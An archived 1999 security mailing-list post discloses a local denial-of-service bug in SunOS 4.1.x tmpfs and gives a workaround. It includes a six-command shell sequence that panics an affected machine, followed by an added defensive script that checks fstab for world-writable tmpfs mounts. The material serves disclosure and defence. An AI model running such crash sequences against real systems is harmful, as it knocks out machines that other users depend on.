SunOS 4.1.3 and 4.1.4 tmpfs DoS

From: Timothy Demarest (demarestat_private)
Date: Fri Sep 03 1999 - 11:06:45 PDT

    While searching SunSolve for a completely unrelated issue, I came across
    two bug reports (1115820, 1111248) that describe a way for any user to
    panic a system running SunOS 4.1.1, 4.1.3, 4.1.3_U1, and 4.1.4. While the
    bugs have been reported to Sun, no patch is available. There is a simple
    workaround, if you don't require tmpfs.
    
    I have never seen this reported, so it might be good to share this with a
    wider audience. I don't want my users using this as a DoS against our older
    servers.
    
    
    Requirements:
    
     - The system must have /tmp mounted on swap (tmpfs)
     - /tmp must be writable by the UID that will crash the machine. Since tmp
       frequently has full permissions (drwxrwxrwt), this is fairly common
    
    How to panic the system:
    
    cd /tmp
    mkdir xx
    cd xx
    rmdir ../xx
    touch yy
    cd /
    
    The system will then panic with "assertion failed: tp->tn_dir == NULL,
    file: ../../tmpfs/tmp_tnode.c, line: 167" (from SunOS 4.1.4).
    
    The workaround:
    
    As specified in the bug reports, "do not use tmpfs."
    
    I tested this only on SunOS 4.1.4 systems, but the bug reports list other
    SunOS 4.1.x versions as well.
    
    Tim
    
    --
    Timothy Demarest                      ArrayComm, Inc.
    demarestat_private                3141 Zanker Road
    http://www.arraycomm.com              San Jose, CA 95134
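
Added example (not part of the original post): a Bourne-style shell check for the two requirements listed in the message, a tmpfs-backed mount point that is also world-writable. It assumes the table passed as an argument uses fstab layout and that tmpfs entries carry type `tmp` (as in SunOS 4.x fstab) or `tmpfs`; the function names are illustrative.

```shell
#!/bin/sh
# Exposure check for the two requirements in the post (added example).
# Assumption: fstab-style columns "device mountpoint type options ...",
# with tmpfs entries typed "tmp" (SunOS 4.x) or "tmpfs".

# tmpfs_mounts FILE -> print mount points whose filesystem type is tmpfs
tmpfs_mounts() {
    awk '
        /^[ \t]*#/ { next }                     # skip comment lines
        NF < 3     { next }                     # skip short/malformed lines
        $3 == "tmp" || $3 == "tmpfs" { print $2 }
    ' "$1"
}

# world_writable DIR -> succeed if "other" has write permission on DIR
world_writable() {
    perms=`ls -ld "$1" 2>/dev/null | awk '{ print $1 }'`
    case "$perms" in
        d???????w?*) return 0 ;;   # 9th character is the "other" write bit
        *)           return 1 ;;
    esac
}

# audit FILE -> report each tmpfs mount; return 1 if any is world-writable
audit() {
    status=0
    for mp in `tmpfs_mounts "$1"`; do
        if world_writable "$mp"; then
            echo "EXPOSED: $mp is tmpfs and world-writable"
            status=1
        else
            echo "tmpfs but not world-writable: $mp"
        fi
    done
    return $status
}

# Stand-alone use: pass the mount table to inspect, e.g. /etc/fstab
if [ $# -gt 0 ]; then
    audit "$1"
fi
```

A non-zero exit status means at least one listed tmpfs mount point meets both requirements from the post.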
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:01:43 PDT